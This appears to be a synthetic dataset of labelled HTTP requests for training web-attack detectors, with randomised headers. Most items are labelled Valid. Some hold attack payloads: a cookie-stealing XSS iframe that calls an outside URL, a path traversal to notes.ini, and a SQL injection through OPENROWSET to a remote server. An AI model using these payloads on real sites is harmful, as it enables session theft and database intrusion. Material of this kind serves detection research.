If-Unmodified-Since: Fri, 16 Oct 09 17:51:42 GMT
If-Match: "NJIkJM@vJwSacqy"
If-None-Match: *
If-Range: "c-x-O-QN9-dJ877"
Max-Forwards: 6314
MIME-Version: 7.0
Pragma: tb5K=tIdconee
Proxy-Authorization: Basic cjYzcGpzcnM6bGVzZQ==
Authorization: hmtpx Eetsyts5=oajte
Range: 1034-
Referer: /tkarmNg.wav
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.3 (Machintosh; U; Mac OS X 1.7; Oa-09; rv:2.0.8) Gecko/50043295
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 045x2419
Via: 9.1 www.lbs0t.jpeg:40, FTP/1.6 www.wtei.css
Transfer-Encoding: gzip
Upgrade: yyr85/0.6, mnLmta/7.1, sedrw/1.7, wRp3/3.2, ebe/4.8
Warning: 763 www.tBeic.jpeg "daariegtelcya7h" "Tue, 12 Oct 04 10:28:02 CET"
X-Forwarded-For: 59.74.190.194
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

odotbinosetdden=hinncs\i$elikea8ee o4Bl&lbeyg=zmbtoiemed1pdkyet&u8ezUafnncr5mh=nusru&uuaYr1cbnransr=s&hh=801927&8zq8k=l3nU7Y2

End - Id: 7638
Start - Id: 5100
class: Valid
PUT /i7oKK/1rZZR_RDOjej/8XDpporbodyDHg/rcuftdoo/8N_B.aspx? HTTP/1.1
Content-Length: 37
Content-Language: yrhueNs,Xh,fRunrhar
Content-Encoding: gzip
Content-Location: http://www.uiea.org/ptsohd/ihhaeet.jsp
Content-MD5: ZGxhcGVpY2h0bG9QdmVvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Feb 08 23:59:40 CET
Last-Modified: Fri, 15 Dec 06 21:09:38 UTC
Host: 88.98.136.52
Connection: close
Accept: image/*, image/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-niEe, 6fi1aHd-f6ia, eMa32ea-F;q=0.2
Cache-Control: no-cache
Client-ip: 204.102.238.44
Cookie: nitiscT3aTsdItl=os;tyO=ooestzs|v3;khB=71000730
Cookie2: $Version="95"
Date: Tue, 27 Jul 04 18:14:41 GMT
ETag: ".gbrYssKFPv@V7NeRZ02"
Expect: 100-continue
From: dthmE@rrep.ch
If-Modified-Since: Fri, 10 Aug 07 19:55:17 GMT
If-Unmodified-Since: Thu, 25 Dec 08 06:43:36 UTC
If-Match: *
If-None-Match: "XP@X_kjxP9aUI1m"
If-Range: "Z8V6IGl0bz6vQL@SF"
Max-Forwards: 5921
MIME-Version: 8.8
Pragma: 81hr9aee=r
Proxy-Authorization: Basic dGlzRzhldzpsN3dpaW53eQ==
Authorization: Digest nc=a9eB4Dbd
Range: 4666-,507125-81685,186998-
Referer: http://6cwiaotl.de/r24y88C/neqm.wmn
TE: deflate
Trailer: Host
User-Agent: Mozilla/9.3 (Windows; U; Win 9x 5.3; rt-ei; rv:4.1.9) Gecko/58305473
UA-CPU: PowerPC
UA-Disp: 850,8218,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 436x920
Via: crt/4.0 74.247.47.233, ePTty/1.9 92.187.144.46, FTP/7.3 82.147.220.145
Transfer-Encoding: gzip
Upgrade: efd74o/3.6, MmfD/3.2, o6ce/9.4
Warning: 201 30.198.208.54 "slstaBaOnasolmatoin" "Thu, 04 Nov 04 06:08:49 GMT"
X-Forwarded-For: 248.188.122.40
X-Serial-Number: 5152392
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oL9yscript@y@C=oJyoxp&n5imm05onTeef=m

End - Id: 5100
Start - Id: 15688
class: Valid
GET /dRvJtYtHyJyvwgHPI/ebGR3/V31rincludecI/7W6aqdU12/w75im3OFkmrpMg5jV-pY/8drdEoceigaoora.js?raa6eqi2tyh7hn=5l&nj=278754 HTTP/1.1
Host: 131.240.36.214
Connection: keep-alive
Accept: audio/*, application/*, application/*;q=0.7
Accept-Charset: iso-8859-2
Accept-Encoding: compress;q=0.9, identity, gzip;q=0.5
Accept-Language: *
Cache-Control: a=Ntnty
Client-ip: 150.199.13.11
Cookie: ssaoo5trmt=s@Yh2@G6
Cookie2: $Version="322"
Date: Fri, 09 Oct 09 05:03:32 UTC
ETag: "MYki.uof4Jf1o_crx"
Expect: adapRas=stI4
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Sat, 03 Mar 07 13:00:29 UTC
If-Unmodified-Since: Wed, 06 Jan 10 02:52:03 GMT
If-Match: "7HcPy4PASNQeOzbb2Qt"
If-None-Match: "MGeBJuZlf1HFKJ82"
If-Range: *
Max-Forwards: 76
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://vjeweape.ch/tfaehgm/Ctfsbe/icmAaA.jpg
Authorization: Basic c2kxRGk6bnQ1dG9vRQ==
Range: 3-,7482-,845238-
Referer: /c9enead.wmn
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.0 (compatible; radbcelh; Open BSD i586; entt)
UA-CPU: StrongARM
UA-Disp: 9331,266,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2296x8201
Via: HTTP/9.6 186.37.3.8
Transfer-Encoding: compress
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 483 www.blypln.jpg "tisraoleeohss" 
X-Forwarded-For: 23.70.171.229
X-Serial-Number: 4254681
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 15688
Start - Id: 48116
class: XSS
GET /detedrc7rsoc0dsn2n5t/pD/iE6N_R/dfD2Py/ir/c5CDq_8LZzUFv/eeil6iesi/hXFGiDOFaLB8/o0fBJ/cobhietemoa7ataiayf.html?6oar=%3Ciframe+src+++%3D+++%22+vbscript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.on.com%2Fcgi-bin%2Fan.cgi%27%2Bdocument.cookie%29%3B%5D+%22%3E&bNabfexitoer=4509330001&uq2eaon7efbhtIw=gylwvAd&PN6gsrnttfumO=finCh&mqt2tvns=3981037 HTTP/1.0
Host: 216.249.36.66
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wgurse-mreyd, egsd-dt, amnttnom-srsitu;q=0.7
Cache-Control: max-age=7438
Client-ip: 228.184.243.149
Cookie: 4aue2n7Oix=5oaq;selmbohtseeed=yHrpRIVLIAW
Cookie2: $Version="832"
Date: Tue, 22 Nov 05 20:14:51 GMT
ETag: W/"wY2g.ylHPrDD1qK1A"
Expect: ahe0tkh
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Thu, 05 Feb 09 05:16:37 GMT
If-Unmodified-Since: Thu, 27 Apr 06 20:59:13 UTC
If-Match: "xPb8iK-qdGXF1uL@"
If-None-Match: *
If-Range: "edcBr0NRKBaBU8o"
Max-Forwards: 8
MIME-Version: 3.4
Pragma: 4eenio=tdfkms
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: /rcr7vnso/Xega/lg5gru/ozct4ea/aueae.mpeg
TE: deflate;q=0.0,trailers
Trailer: Accept-Charset
User-Agent: ws1jed9/2.5.4
UA-CPU: 68000
UA-Disp: 367,260,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6001x2247
Via: 1.0 145.243.65.117, HTTP/0.3 109.41.215.3, 1.0 61.82.74.170:8557
Transfer-Encoding: yrsvso
Upgrade: cin6t/6.3, tsnb7/3.2, ieet/2.7, 0zynrz/6.2
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 72.155.7.72
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48116
Start - Id: 45139
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: 33.196.30.255
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: identity, deflate, compress;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 217.130.119.31
Cookie: ar=rSaeJllGm;t@@87=85;eInv8ow=605;teealdid5mewsR=lwemDpPX6YVR
Cookie2: $Version="6"
Date: Wed, 26 Nov 08 24:05:11 GMT
ETag: W/"qlX4ysgfATZLcpalHWf0"
Expect: 100-continue
From: ydgsh@esUe.cz
If-Modified-Since: Wed, 20 Sep 06 16:04:44 GMT
If-Unmodified-Since: Sun, 06 Mar 05 19:41:35 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Feb 09 01:03:48 UTC
Max-Forwards: 32
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Digest algorithm=aozyppmt
Range: -3,456-488022
Referer: http://www.elIreg.net/evne5ewq/rwt1ml6.mpeg
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/2.6 (X11; U; Open BSD i386 0.8; fd-ai; rv:2.8.0) Gecko/93356874
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0464x327
Via: FTP/9.0 166.8.238.188, HTTP/6.7 253.117.130.111, ercei8/8.4 215.122.1.27
Transfer-Encoding: deflate
Upgrade: rnttO/3.2, lWf/3.6
Warning: 013 225.152.0.238 "2et72a3uTe5t" "Sat, 06 Jun 09 02:10:05 GMT"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ----------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45139
Start - Id: 41254
class: SqlInjection
GET /eaKVw.s/cFXsHwO3Nm2HEoxvCj8m/53n1p1QRro/t9Gl9Yfq8vV/wlCD3xElWR3TZ/0WG0/4V9kuizFtJ0v3/4maildocument7p/oWzAoJ.aspx? HTTP/1.0
Host: 241.169.86.192
Connection: Te6ote
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: ;     select   *     from   OPENROWSET('SQLoledb','uid=wks;pwd=E3isarN;Network=DBMSSOCN;Address=203.126.100.37,31581;','select     *    from   b4n76vi0'  )
Accept-Language: *
Cache-Control: max-stale
Cookie: .U4IvhBP=pMj;atitnh=wrjr1&o3ftjTc
Cookie2: $Version="81"
Date: Mon, 07 May 07 10:04:59 GMT
ETag: "Xj42@dWTGsmYvJV1"
Expect: 100-continue
If-Modified-Since: Thu, 06 Nov 08 05:54:52 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9834
MIME-Version: 3.5
Pragma: oiyt='o1'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic dWlydzphNmlMenNuYg==
Referer: /betme/adbjhhi/eleyoco8.avi
Trailer: Upgrade
User-Agent: Mozilla/4.2 (compatible; Konqueror/7.5; Open BSD i386; ebsx; aeAexI; frrr)
UA-Disp: 2037,099,32
Via: FTP/2.8 57.229.128.21
Upgrade: 6ihe/8.9
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41254
Start - Id: 16011
class: Valid
GET /7so1esuholoc/eaontdacTrafCn/dc5LBMCk1S/bolph/rzB1bn7jqbcoasoe/rercddnt.gif? HTTP/1.1
Host: www.6dxeeew.net
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese;q=0.6, x-mac-icelandic;q=0.9, x-mac-cyrillic;q=0.9, big5;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 95.5.104.71
Cookie: TtdcHemb=0811;BQsock_streamAL=wo;ole8esa3ndq9r=xZmQbehbb4oiyvr;EritMvieeurrrtg=m1J.2NCd-
Cookie2: $Version="752"
Date: Thu, 08 Mar 07 24:52:53 UTC
ETag: W/"85Fpma6ww6zBMU_9k"
Expect: 100-continue
From: oxTitn7i@hiofnAlun.cz
If-Modified-Since: Sat, 19 Feb 05 13:58:30 GMT
If-Unmodified-Since: Mon, 28 Nov 05 24:50:53 UTC
If-Match: "wCnesen1Jr32f@nVZaUF"
If-None-Match: *
If-Range: Wed, 07 Dec 05 02:20:47 GMT
Max-Forwards: 088
MIME-Version: 9.2
Pragma: Lfrmo=iu5hp
Proxy-Authorization: NTLM bnR0NWVwY2V3dGNyaGp4N29jdGNpZXN0aXNiMjNwaUNHc2VqOGVl
Authorization: Digest qop=auth
Range: 120-88552
Referer: /iohut/upash/slhn/eaieoin/mndaE2.css
TE: trailers,deflate;q=0.0
Trailer: If-Match
User-Agent: Mozilla/8.7 (Windows; U; Win98 3.4; s7-ee; rv:2.8.7) Gecko/05958570
UA-CPU: MIPS
UA-Disp: 049,9339,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 273x3585
Via: lsfeg/7.0 www.p0he60.gif, 7.7 www.elsadEdl.jpg:8015, FTP/1.7 www.eT09.html
Transfer-Encoding: gzip
Upgrade: e51r5e/8.0
Warning: 561 www.ei17228.html "tww6cihanh" 
X-Forwarded-For: 17.124.48.70
X-Serial-Number: 50615097435656
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16011
Start - Id: 33744
class: Valid
POST /eSs8@sk/tp3ril/igNlrdn9fln4dez/tBGZEJOWRG3wviKl7uN5/iqlaioefull9ee/yr1.@efS/oQcBF1YpK0Ac6rd2J/2Cwh05agtm0Ar/eosmafimeD0peirrs/uaccess_logDwindow.openWxp_9Tcboot.inio/npokpkuFshAYcON/wNu7Y.gif? HTTP/1.0
Content-Length: 116
Content-Language: y,i,n
Content-Encoding: gzip
Content-Location: /hoelth.cgi
Content-MD5: aGh0dGVua2VnT2liYmR1bA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Sep 04 09:30:38 UTC
Last-Modified: Thu, 26 Aug 04 11:29:27 CET
Host: 229.197.75.78
Connection: close
Accept: image/jpeg;q=0.8, text/plain;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: dlt-dr7usegd;q=0.2, ecvpa4ec-sh;q=0.1, m0eebnrr-ewsS6, 9kisoyIz-7SS
Cache-Control: no-store
Client-ip: 42.66.55.236
Cookie: SjaUeez3Msdba=oCoz1Um70lJK;itoese4ida=nr/ri;c2CdSe7cb=Rftp4
Cookie2: $Version="69"
Date: Sun, 30 Mar 08 09:58:33 CET
ETag: "sRRxnJ6Z_qxKvecEKi.-"
Expect: 100-continue
From: ocSTi@saeeTeucT.ch
If-Modified-Since: Thu, 17 Jul 08 22:37:54 CET
If-Unmodified-Since: Sun, 12 Dec 04 18:20:11 UTC
If-Match: "Vtudxz.3NT.nN92DZteE"
If-None-Match: "utqOj.CjT@BD5xCAX6wa"
If-Range: Wed, 16 Jan 08 22:08:25 UTC
Max-Forwards: 9
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: dotzna obUns=tvetsd
Authorization: Basic MmhuaGQ6bHNucg==
Range: 157212-,-82365,95975-54243
Referer: /nduyj3mc/isUh/tuy8ia47/tceet.mdb
TE: trailers
Trailer: Authorization
User-Agent: i6e4syotS (hKM0@3Y)
UA-CPU: StrongARM
UA-Disp: 020,4035,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 520x205
Via: 8.9 11.238.25.136
Transfer-Encoding: compress
Upgrade: emiexT/3.0, iinIni/9.7, efhial/0.0, rndpy/6.5, en3mcn/3.8
Warning: 146 www.heyaohc7.png "iqTeaiaieCen" "Thu, 28 May 09 11:14:53 UTC"
X-Forwarded-For: 79.156.30.170
X-Serial-Number: 695598853636
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ftpmochax-CaWShavingP7X=6322192&iretsslQdned9w=gereo-l6tautoexecE&dval=651454580&Il4lI=74653770&ees9vJLmheneua=opou 

End - Id: 33744
Start - Id: 24513
class: Valid
GET /zelieiMsiOs8Si6ssimf/ryQX/eEaeosvster9gE76cred/EQP4processing-instructionKaX9@09vl/eaiTceros3oa4iDooab2.htm?tmN2sieojt=wtu%2Fdalldeerlsoaea%3Da&eheldqthsweEeEc=4372193 HTTP/1.0
Host: www.mheoojxe.it
Connection: keep-alive
Accept: application/*;q=0.6, audio/basic;q=0.4, application/*;q=0.7
Accept-Charset: x-mac-ce, x-mac-ce, x-mac-greek, x-mac-cyrillic, windows-1253;q=0.5
Accept-Encoding: compress
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 106.138.49.194
Cookie: NWXM=eXs7hQ;5rrcnrcOsroDmt=gQI;lbm9=45;acceptuvP3il=465cpps;whereuvSB=3
Cookie2: $Version="5"
Date: Thu, 07 Jan 10 09:52:56 GMT
ETag: "S4zTUrwjKvccHcU7"
Expect: abo4
From: pzwu7iEa@yhivtK.st
If-Modified-Since: Sun, 16 Dec 07 24:33:47 GMT
If-Unmodified-Since: Sat, 22 May 04 22:49:55 UTC
If-Match: "772m.1fWU-f2HkrOm"
If-None-Match: "dyMPaz_Dugh39UUup"
If-Range: "KevFAFy07Rx67Uh3NeP"
Max-Forwards: 932
MIME-Version: 3.9
Pragma: EdqOt=iuMen
Proxy-Authorization: Basic ZXNTZmFhOmVvaWZkb3M=
Authorization: Basic UmlOYWE6YXJhaXlu
Range: 82473-,14-52,-8
Referer: /0avSh/oc2atsgn/sshnae.png
TE: chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/0.1 (Windows; U; Win 9x 4.6; 9e-vd; rv:6.1.3) Gecko/87365992
UA-CPU: PowerPC
UA-Disp: 9148,760,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0451x999
Via: 7.2 www.Efst.jpeg
Transfer-Encoding: identity
Upgrade: sem/4.3, wo5ey/5.5, nzioc/1.6
Warning: 566 www.Xphrezsp.htm "njtsn" "Sat, 25 Mar 06 03:51:16 UTC"
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 24513
Start - Id: 24360
class: Valid
GET /tdO2A.o/dIcy@rZt75r1DN0uvWf/glYnllpag/gCteYI4@M_mOlocation/tLEspsdocumentB/cIczqeTAmaonBoemd/smd59onKdq2jr4xb/eaalg/tIhsote3.msf?Trmrj=4iadocumentltGi+teti HTTP/1.1
Host: 218.63.128.152
Connection: keep-alive
Accept: application/rtf
Accept-Charset: windows-1252;q=0.2
Accept-Encoding: identity, deflate;q=0.0
Accept-Language: *;q=0.0
Cache-Control: max-age=3
Client-ip: 114.108.65.238
Cookie: fo=72070;ynulyKHxQjt=copyd eseehi;dtAhfoetdI9ON=3802102
Cookie2: $Version="7"
Date: Tue, 11 Jul 06 13:56:31 CET
ETag: W/"iGg4GyFoonVM8sn"
Expect: 100-continue
From: 5hRu@STpwssetis.be
If-Modified-Since: Sat, 15 Jul 06 17:29:19 CET
If-Unmodified-Since: Tue, 21 Aug 07 14:53:49 CET
If-Match: "Vtyi_tax34jY7RwE1"
If-None-Match: *
If-Range: "ivQemFmBM.Yo9lMU"
Max-Forwards: 1
MIME-Version: 5.2
Pragma: RahasOc='puls7ih'
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: tgii7t 6heesirh=sretjt
Range: -290,922508-,-602
Referer: /entlo/gty5/emoEtes/ssmtep/ookst.doc
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.6 (X11; U; Linux i386 0.0; oh-sg; rv:1.2.6) Gecko/52527476
UA-CPU: x86
UA-Disp: 801,8735,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 352x5203
Via: HTTP/4.7 www.5i7Bc26v.tiff, 7.2 www.ssvoOg.tiff
Transfer-Encoding: identity
Upgrade: dmd/4.2, Tdhwx9/6.6
Warning: 748 www.Nint.js:86733 "me6otyateqi77lTde" "Tue, 01 Mar 05 01:32:17 CET"
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24360
Start - Id: 27836
class: Valid
GET /su.qyoe.TSm_/7nlciasbF/tifnaeUt/h66ncv_vpKlXZuWx/t73W4Kb2EivaNZ0H/eOUYFXW3xCSFbBpWIb/uj.bGjfA5TPvT_UE/oKn/dtPrQjiZzvKMK/vRh.dll?taeyg=25044377&NfTaelhht=xuwget&vt0eAIu=1143330597&Z34Qg2pTnI6=irGsT.KIAv&RBfQ@=f5wmhe HTTP/1.1
Host: www.s4tsthiaa.org
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: hewo-g, eAdS-ch, 1fsrnt-ssane;q=0.0, ib-e4thhp, oso0adg-hen0;q=0.5
Cache-Control: rehetgey='rwrph'
Client-ip: 195.88.135.206
Cookie: Hpe=nm4neaeosmeuit;ee6t3wto0nlogh=rLju8sxToaJ.;t0sAktu=nvhfopent~n;ea9MH6LoD=561451;owh8hkrinragds=3edlr;dlhtxt17eecdco=4neoueaaritnoBr
Cookie2: $Version="9"
Date: Mon, 23 Apr 07 19:55:04 CET
ETag: "T7R-PajXniYdaIVIMa"
Expect: uoodntgw
From: xalea@r7nedo.fr
If-Modified-Since: Sun, 05 Oct 08 08:02:11 GMT
If-Unmodified-Since: Thu, 14 Feb 08 14:13:28 UTC
If-Match: *
If-None-Match: "NWzEOx6J2frU.S6y"
If-Range: *
Max-Forwards: 6
MIME-Version: 4.0
Pragma: itEs1='ser'
Proxy-Authorization: rrhv teeapa0=ahtafwd
Authorization: NTLM Z25oNFRlOXN1bnVpeW1Od3VsZXdvcGlsbko0bzRpSHI=
Range: -858224
Referer: http://www.4lEtos.de/trhno/ntaexd/gsk9e/sheN.msf
TE: gzip,trailers,chunked;q=0.5
Trailer: Range
User-Agent: Mozilla/4.6 (compatible; cVubao; Mac OS X; GootLevez)
UA-CPU: x86
UA-Disp: 904,456,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 277x778
Via: 5.5 www.aQena.tiff:5596, oiaue/0.6 241.248.53.155, 1.7 www.omtete.png
Transfer-Encoding: etgeoo; aeit=u09s
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 27.223.128.62
X-Serial-Number: 92325368257
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27836
Start - Id: 33668
class: Valid
PUT /e3A.M.51eMO/eDtxUSZXUbxL61u8mN/opiBU9NLPOIrW/r4bolpM/MKyAtjBl1z/athg.exe? HTTP/1.1
Content-Length: 277
Content-Language: 5,lnp0,ehOIee
Content-Encoding: deflate
Content-Location: http://4stutch.uk/eoxys/dhhffmr/BI9is/Dssam62l/etBe.pl
Content-MD5: c3Zsd2NzdHRic3lhc3Q5ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Dec 09 13:44:51 CET
Last-Modified: Fri, 23 Mar 07 02:00:42 GMT
Host: www.uhoerwlr.st:0714
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.9, gzip;q=0.7, identity;q=0.5
Accept-Language: T-t, w-cedmfs, lswm-K;q=0.4, akeaare-8ylu;q=0.6, yase-naeoe
Cache-Control: max-age=94
Client-ip: 251.112.65.219
Cookie: 2ctou=E98sle;hataeSnee=tslissadpgnvoa3s;mceocnHnantofts=oPB-FT7EV3;at=6320536;dews0t=iemees;gJXD=insajttdi
Cookie2: $Version="833"
Date: Fri, 25 Mar 05 24:00:25 CET
ETag: W/"M7e4V7iKKpZdZARV"
Expect: 100-continue
From: oddo@iRpsbfrd8.it
If-Modified-Since: Wed, 11 Feb 04 21:12:36 GMT
If-Unmodified-Since: Fri, 04 Jan 08 21:53:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 20 Jan 06 18:14:07 UTC
Max-Forwards: 459
MIME-Version: 8.3
Pragma: xeicidr='tkme'
Proxy-Authorization: NTLM bnJnckVoaTZ0ZXRybDhlaDNudG9pY2FpaXJvY3JvNVJlY3RlaG9hZWN0ZWV3ZW1l
Authorization: Digest opaque="reuor4ca"
Range: 97019-,-6
Referer: http://tsoieda.gov/rnncek/nhinAwhu/akrw3/nnic.png
TE: trailers,deflate
Trailer: Referer
User-Agent: Mozilla/5.8 (Machintosh; U; Mac OS X 3.7; r9-sm; rv:2.8.3) Gecko/26405463
UA-CPU: PowerPC
UA-Disp: 0976,3445,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3257x6651
Via: 2.9 www.litre.jpg
Transfer-Encoding: gzip
Upgrade: Zmrps/0.2
Warning: 037 181.128.102.21 "acgsirboetmtat" "Fri, 11 May 07 02:35:47 UTC"
X-Forwarded-For: 199.124.172.154
X-Serial-Number: 6339975961282
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CCpnre=xp_logi&foqmie6t=uisystemi-nwdwinntfdnta&jmailVCVAVyhttpsW3=hfEcjHldhf&u5reoinotIesaip=nmhaand&30Wv2kD=yiheTspslo&yg35maiep=ora&xaosmerlrz=r8FXuJtSK&iawah5xeZjcfm=e  a8&ioeaisfosgmu=4&owoa=d%h7eto3e&sowrpmrdeinmgh=dodirin3batahkae&seee8esniIer=955733&163o=0d&4r=936321

End - Id: 33668
Start - Id: 31547
class: Valid
GET /gpa5iqGGSri8-9SV1H8/hS9U.uy_G9zSBnoUgn_/iEfJV9mAVaGkRMIu5fs-/eXQw/Y.ku.BgP.css?mr=05231220&tFQNn=023346379&a6XCvoGi=0&blfki2inthlen=3342351&XZnu6x=sfisiln8hf&eehreefoa=qjzBvhxjP87n&ad5grlqdegiln=%7Ee+&6owtylndgm=d_4 HTTP/1.1
Host: 225.155.46.59
Connection: N1lrpas
Accept: application/*, text/plain
Accept-Charset: windows-1252, macintosh;q=0.7, windows-1254;q=0.4, isiri-3342;q=0.0
Accept-Encoding: 
Accept-Language: utiremHR-2Thi, j-odrae, unO-ef;q=0.4, rthn-o5t4
Cache-Control: min-fresh=87
Client-ip: 234.66.106.126
Cookie: tRJghollinku=aWsO_t9j;etnmDeartna=8;ycdxarestBp=k f:;~;xf2Rldec=4693685
Cookie2: $Version="712"
Date: Tue, 09 Feb 10 19:05:35 GMT
ETag: W/"w4kvgE8p5Yau4wovab"
Expect: 100-continue
From: hlyrn9n@fimlaeyny.st
If-Modified-Since: Sat, 07 Apr 07 22:35:36 GMT
If-Unmodified-Since: Fri, 13 Jan 06 20:43:14 CET
If-Match: "8AY9m7_ySi6@Q0CO8B"
If-None-Match: *
If-Range: *
Max-Forwards: 5371
MIME-Version: 3.2
Pragma: emolcosa='ong7'
Proxy-Authorization: NTLM dE1laXRucXB0bjJ0ZGRybHlpYW9ubm50c3JobnVtZXpoZGhhZWU=
Authorization: Basic M3RuZWU6dHV3aXJwZXI=
Range: -2245
Referer: /tEe53/i8ed/ra1et/neaaE.mdb
TE: chunked
Trailer: Via
User-Agent: Mozilla/8.8 (Windows; U; Windows NT 7.2; eo-tl; rv:3.9.4) Gecko/41263240
UA-CPU: x86
UA-Disp: 201,1395,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8565x5206
Via: HTTP/4.9 91.197.233.180, 6.2 100.171.65.165
Transfer-Encoding: seisc
Upgrade: iwe/8.2, ep3eof/7.6, paia/0.4, e4dhI/1.4
Warning: 692 93.18.81.84 "ekeserIpnR5clrwret" 
X-Forwarded-For: 231.71.249.70
X-Serial-Number: 7616561595248452
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31547
Start - Id: 14098
class: Valid
GET /o0vbscriptnode1kTHjy/ptgastmeto/amuehag/rtrrepv0btB9nsa/ohboot.ini3mscriptN/OJRwI-TJo.js?tfeen9irt9et=9O4feZwy&bspJr=007489 HTTP/1.1
Host: www.oa3etrls.ch
Connection: r0eAeohi
Accept: audio/basic, image/*;q=0.1
Accept-Charset: koi8, x-mac-turkish, iso-8859-9, gb2312, x-mac-korean
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 250.248.98.251
Cookie: ni0=Bfcyu group by0s<YoMD;eelfef=11933
Cookie2: $Version="3"
Date: Sun, 30 May 04 02:36:35 CET
ETag: W/"OFX8qW6@tVkBPnDzL"
Expect: sK3n=wyein
From: apCylsgf@aiOdeitn.it
If-Modified-Since: Sun, 27 Nov 05 01:29:37 CET
If-Unmodified-Since: Fri, 06 Jan 06 15:02:33 GMT
If-Match: "OihgoSJEGwNDQGEZVdZB"
If-None-Match: "usIDgmAjVqZCh.RyN"
If-Range: Sun, 20 Jun 04 14:13:44 CET
Max-Forwards: 88
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic cnhlaXN1czplb3hldGk=
Authorization: iA4ip dP8y=lSo3uei
Range: 784942-,615-
Referer: http://www.aoan.biz/fTRxen.sh
TE: deflate
Trailer: Host
User-Agent: Mozilla/7.4 (Machintosh; U; Mac OS X 3.5; rl-ns; rv:4.8.3) Gecko/90615195
UA-CPU: 68000
UA-Disp: 9144,843,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5013x5767
Via: 7.6 92.153.139.209
Transfer-Encoding: compress
Upgrade: AwRag/8.7, eiPt/1.4
Warning: 330 107.110.243.183 "eugbdottuttihe6M9i" 
X-Forwarded-For: 123.87.48.214
X-Serial-Number: 45329823
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14098
Start - Id: 20683
class: Valid
